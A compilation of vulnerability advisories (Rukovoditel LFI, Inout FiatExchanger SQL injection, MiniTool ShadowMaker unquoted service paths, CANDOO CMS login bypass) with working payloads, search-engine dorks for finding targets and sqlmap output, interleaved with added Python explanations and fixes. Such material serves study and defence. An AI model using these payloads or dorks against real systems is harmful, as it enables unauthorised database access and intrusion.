<pre><code>====================================================================================================================================<br />| # Title : Rukovoditel Project Management CRM 2.4.1 LFI Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 65.0(32-bit) | <br />| # Vendor : https://www.rukovoditel.net/ | <br />| # Dork : "Powered by Rukovoditel" |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] index.php in the install folder, line 25: include('languages/' . $_GET['lng'] . '.php');<br /><br />[+] The lng parameter is concatenated into the include path without any validation. Note that PHP only treats an include path as a URL when the string itself starts with a wrapper such as http:// (and only with allow_url_include enabled); with the 'languages/' prefix from line 25, the remote URL below is handled as a local path, so the practical impact of this line is local file inclusion through traversal sequences (the appended .php suffix restricts which files can be reached). The %3F (a URL-encoded ?) is the usual trick for turning the appended ".php" into a query string when a remote URL really is fetched.<br /><br />[+] Use Payload : /install/index.php?lng=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&step=rukovoditel_config<br /><br />[+] https://target_site/hrprocess//install/index.php?lng=http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg&step=rukovoditel_config<br /><br />Greetings to :=================================================================<br />jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |<br />===============================================================================<br /></code></pre>
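<p>The include line quoted in the Rukovoditel entry is the whole bug: whatever arrives in lng is glued between 'languages/' and '.php'. The Python below is an added example, not Rukovoditel's code. It models that path construction, shows what the advisory's payload and a traversal string turn it into, and the two checks that close it: an allowlist of language codes and a lexical containment test against the languages/ directory. The install location in LANG_DIR is assumed; the payload is the one from the entry.</p>

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed install location of the languages/ directory (not given on the page).
LANG_DIR = "/var/www/rukovoditel/install/languages"
# Allowlist for what lng may look like: en, fr, pt_BR, ...
LANG_CODE = re.compile(r"[a-z]{2,3}(?:_[A-Z]{2})?")
# The advisory's payload, verbatim.
PAYLOAD = ("http://some-inexistent-website.acu/"
           "some_inexistent_file_with_long_name%3F.jpg")


def include_target_vulnerable(lng: str) -> str:
    """Mirror include('languages/' . $_GET['lng'] . '.php'): no validation.
    PHP has already URL-decoded the query string, so %3F arrives as '?'."""
    return "languages/" + unquote(lng) + ".php"


def uses_stream_wrapper(target: str) -> bool:
    """PHP only fetches a URL when the include string *starts* with a wrapper
    such as http:// (and allow_url_include=On); a wrapper appearing after a
    directory prefix is just an odd-looking local path."""
    return re.match(r"[A-Za-z][A-Za-z0-9+.-]*://", target) is not None


def stays_in_lang_dir(lng: str) -> bool:
    """Lexical containment check: normalise the concatenated path and require
    the file to sit directly inside LANG_DIR (no traversal, no subdirectory)."""
    target = posixpath.normpath(LANG_DIR + "/" + lng + ".php")
    return posixpath.dirname(target) == LANG_DIR


def include_target_hardened(lng: str) -> str:
    """Allowlist first, containment second (defence in depth)."""
    lng = unquote(lng)
    if not LANG_CODE.fullmatch(lng):
        raise ValueError(f"unsupported language code: {lng!r}")
    if not stays_in_lang_dir(lng):
        raise ValueError("resolved path leaves the languages directory")
    return posixpath.join(LANG_DIR, lng + ".php")
```

The allowlist alone is sufficient here; the containment check is kept because it is the control that survives when someone later relaxes the pattern. Both are lexical, so they hold regardless of what exists on disk.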
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Vulnerability ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : https://www.inoutscripts.com/products/inout-blockchain-fiatexchanger/ │<br />│ Vendor : Inout Scripts │<br />│ Software : Inout Blockchain FiatExchanger 3.0 │<br />│ Vuln Type: SQL Injection │<br />│ Impact : Database Access │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ │<br />│ SQL injection attacks can allow unauthorized access to sensitive data, modification of │<br />│ data and crash the application or make it unavailable, leading to lost revenue and │<br />│ damage to a company's reputation. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. 
SQL, MoizSid09, indoushka <br /> <br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2023 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Path: /index.php/coins/update_marketboxslider<br /><br />----------------------------------------------<br />POST /index.php/coins/update_marketboxslider HTTP/2<br /><br />marketcurrency=[SQLI]&displaylimit=4<br />----------------------------------------------<br /><br />POST parameter 'marketcurrency' is vulnerable to SQL Injection<br /><br />---<br />Parameter: marketcurrency (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: marketcurrency=(SELECT(0)FROM(SELECT(SLEEP(6)))a)&displaylimit=4<br />---<br /><br /><br />[+] Starting the Attack<br /><br />fetching current database<br />current database: '*****_blockchain_fiatexchanger_**'<br /><br /><br /><br />[-] Done<br /></code></pre>
<pre><code># Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: https://www.minitool.com/<br /># Software Link: https://www.minitool.com/download-center/<br /># Version: 12.7<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36164<br /><br /># PoC<br /><br />C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto<br /><br />C:\Users>sc qc MTAgentService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MTAgentService<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : MTAgentService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users>systeminfo<br /><br />Host Name: DESKTOP-LA7J17P<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19042 N/A Build 19042<br />OS Manufacturer: Microsoft Corporation<br /><br /><br /># Exploit Title: MiniTool Partition Wizard ShadowMaker v.12.7 - Unquoted Service Path<br /># Date: 06/07/2023<br /># Exploit Author: Idan Malihi<br /># Vendor Homepage: https://www.minitool.com/<br /># Software Link: https://www.minitool.com/download-center/<br /># Version: 12.7<br /># Tested on: Microsoft Windows 10 Pro<br /># CVE : CVE-2023-36165<br /><br /># PoC<br /><br />C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """<br />MTSchedulerService MTSchedulerService C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe Auto<br /><br />C:\Users>sc qc MTSchedulerService<br />[SC] 
QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: MTSchedulerService<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : MTSchedulerService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users>systeminfo<br /><br />Host Name: DESKTOP-LA7J17P<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19042 N/A Build 19042<br />OS Manufacturer: Microsoft Corporation<br /></code></pre>
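<p>Both MiniTool entries rely on the same Windows behaviour: when BINARY_PATH_NAME is unquoted and contains spaces, CreateProcess tries the path cut at every space with ".exe" appended before it reaches the real image, so C:\Program.exe, C:\Program Files.exe and C:\Program Files (x86)\MiniTool.exe would each be started in place of AgentService.exe if an attacker could create one of them. The Python below is an added example, not part of the advisory: it parses the sc qc output quoted above (embedded as constructed sample text, with two made-up services for contrast) and lists, per unquoted path, the files Windows looks for first. Whether any of those directories is writable by a low-privileged user is a separate check on the host.</p>

```python
import re

# Constructed sample input: the two `sc qc` dumps from the advisory, plus two
# made-up services (a quoted path and a path without spaces) for contrast.
SC_QC_OUTPUT = r"""
SERVICE_NAME: MTAgentService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: MTSchedulerService
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        BINARY_PATH_NAME   : C:\Program Files (x86)\MiniTool ShadowMaker\SchedulerService.exe
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleQuoted
        BINARY_PATH_NAME   : "C:\Program Files\Example\svc.exe" -k netsvcs
        SERVICE_START_NAME : LocalSystem

SERVICE_NAME: ExampleNoSpace
        BINARY_PATH_NAME   : C:\Example\svc.exe
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text: str) -> dict:
    """Map SERVICE_NAME -> BINARY_PATH_NAME across one or more `sc qc` dumps."""
    services, current = {}, None
    for line in text.splitlines():
        m = re.match(r"\s*SERVICE_NAME:\s*(\S+)", line)
        if m:
            current = m.group(1)
            continue
        m = re.match(r"\s*BINARY_PATH_NAME\s*:\s*(.+?)\s*$", line)
        if m and current:
            services[current] = m.group(1)
    return services


def hijack_candidates(binary_path: str) -> list:
    """Files CreateProcess looks for before the intended executable when the
    image path is unquoted: the text up to each space, with .exe appended.
    A quoted path or one without spaces yields no candidates."""
    if binary_path.startswith('"'):
        return []
    # Arguments after the executable do not matter: the search stops once the
    # real image is found, so only the part up to ".exe" is considered.
    m = re.match(r"(.+?\.exe)(?:\s|$)", binary_path, re.IGNORECASE)
    exe = m.group(1) if m else binary_path
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def report(text: str) -> dict:
    """Service -> candidate hijack paths, for services whose path is unquoted and contains spaces."""
    found = {}
    for name, path in parse_sc_qc(text).items():
        candidates = hijack_candidates(path)
        if candidates:
            found[name] = candidates
    return found


if __name__ == "__main__":
    for name, candidates in report(SC_QC_OUTPUT).items():
        print(name)
        for c in candidates:
            print("   ", c)
```

This is the same triage the wmic one-liner in the advisory performs in one pipe: the final findstr /v with a double quote drops every service whose path is already quoted, and the C:\Windows exclusion drops paths a standard user cannot write to anyway.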
<pre><code>====================================================================================================================================<br />| # Title : CANDOO Strategic CMS V2.0 Authentication Bypass Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit) |<br />| # Vendor : https://www.candootech.com/ |<br />| # Dork : news2.php?newsno= |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use the payload 1'or'1'='1 as both the username and the password on the admin login form (an SQL injection in the login query).<br /><br />[+] http://127.0.0.1/harvardvisioncom/admin/login.php<br /><br />Greetings to :=========================================================================================================================<br />jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |<br />=======================================================================================================================================<br /></code></pre>
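<p>The CANDOO entry gives only the payload. The Python below is an added example, not the product's code: it reconstructs the kind of login query such a payload targets, shows why 1'or'1'='1 in both fields satisfies it, and puts next to it a parameterised lookup with a constant-time hash comparison that the payload cannot influence. The admin table and the credentials are constructed; the plaintext password column exists only to model the legacy query.</p>

```python
import hashlib
import hmac
import os
import sqlite3

PAYLOAD = "1'or'1'='1"   # the value from the advisory, used as both username and password


def pbkdf2(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db() -> sqlite3.Connection:
    """Constructed admin table. The plaintext 'password' column exists only to
    model the legacy query; the fixed login uses the salted PBKDF2 hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin(username TEXT PRIMARY KEY, password TEXT, "
                 "salt BLOB, pw_hash BLOB)")
    salt = os.urandom(16)
    conn.execute("INSERT INTO admin VALUES (?, ?, ?, ?)",
                 ("admin", "Winter2023!", salt, pbkdf2("Winter2023!", salt)))
    return conn


def login_vulnerable(conn, username: str, password: str):
    """String-built query. With the payload in both fields the WHERE clause reads
        username='1'or'1'='1' AND password='1'or'1'='1'
    which, with AND binding tighter than OR, is
        (username='1') OR ('1'='1' AND password='1') OR ('1'='1')
    and the last term is always true, so the first admin row is returned."""
    sql = (f"SELECT username FROM admin WHERE username='{username}' "
           f"AND password='{password}'")
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_fixed(conn, username: str, password: str):
    """Bound parameter for the lookup, then a constant-time comparison of the
    password hash; the payload is merely a username that does not exist."""
    row = conn.execute("SELECT salt, pw_hash FROM admin WHERE username = ?",
                       (username,)).fetchone()
    if row is None:
        return None
    salt, stored = row
    return username if hmac.compare_digest(stored, pbkdf2(password, salt)) else None
```

The bypass needs no knowledge of the schema: the payload only has to close the string literal and append a clause that is always true. That is also why a login form is the first place to try a tautology, and why the fix is a bound parameter rather than a blocklist of quote characters.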